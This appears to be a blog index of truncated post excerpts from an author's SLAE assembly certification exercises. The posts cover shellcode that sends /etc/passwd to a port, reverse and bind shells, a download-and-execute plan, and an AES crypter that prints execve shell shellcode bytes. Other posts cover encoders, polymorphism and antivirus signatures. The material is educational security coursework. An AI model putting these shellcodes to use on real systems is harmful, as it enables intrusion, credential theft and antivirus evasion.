SLAE: Shellcode read and send file

Because it is so much fun I developed a shellcode, that reads /etc/passwd and then sends the content to port 12345. And here it is: shellcode.c /* ; Author: Daniel Sauder ; Website: ; License ; Shellcode reads /etc/passwd and sends the content to port 12345. ; The file can be […]

SLAE Assignment 7: Crypter

This is the last one and it is about writing a crypter/decrypter. I used python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption. Here is the code for encryption: from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")‘Passphrase123456’, AES.MODE_CBC, ‘IVIVIVIVIVI12345’) l=len(plain) r=l%16 p=16-r print "offset: " […]

SLAE Assignment 6: Polymorphic Shellcode

This assignment is about writing polymorphic versions of shellcodes downloaded by Kill all Processes Shellcode I want to start with a simple one, a shellcode for killing processes which can be found at Here is the original assembler code: killall_orig.nasm section .text global _start _start: ; kill(-1, SIGKILL) push byte 37 pop eax […]

SLAE Assignment 5: Shellcode Analysis

Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I choosed the linux/x86/exec shellcode as first example. With: $ msfpayload linux/x86/exec cmd=”ls” R | ndisasm -u – it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx […]

SLAE Assignment 4: Custom Encoder

This one is about building a custom encoder and decoder. For this I used an insertion / XOR encoder, that splits the shellcode into bytes and inserts a random value. Further the shellcode is decoded using xor with the random value. This way, we have a shellcode, that has nothing to do with the original […]

SLAE Assignment 3: Egghunter Demo

This assignment is about writing a working demo of an egghunter. An egghunter code is basically a piece of code that is searching for a code word (the egg) in the memory. When the egg was found, the egghunter code jumps to the address behind the egg and executes the code at this address. For […]

SLAE Assignment 2: Reverse Shell

What it is about: •  Create a Shell_Reverse_TCP shellcode – Reverse connects to configured IP and Port – Execs shell on successful connection •  IP and Port should be easily configurable Here is the C code I used for prototyping the assembler code: reverseshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void) { […]

SLAE Assignment 1: Bind Shell

What it is about: •  Create a Shell_Bind_TCP shellcode – Binds to a port – Execs Shell on incoming connection •  Port number should be easily configurable Here is the C code for the bind shell, I used it for modelling the assembler code: bindshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void) […]

An Analysis of Shikata-Ga-Nai

Trivia: Shikata ga nai is Japanese and means something like “nothing can be done about it”. Learning is always fun and I was playing around with making ClamAV signatures. I wondered if it is possible to write a signature that matches the famous Shikata-Ga-Nai shellcode encoder shipping with metasploit. After all I succeeded to […]

Writing a download and exec shellcode

After completing the tasks for the SLEA certification, I went on writing a shellcode for downloading and executing a file. For this task I wanna use wget with execve. But first, some pseudocode: start execve wget file_x chmod +x file_x execve file_x end So that is the plan. See a problem here? Look at the […]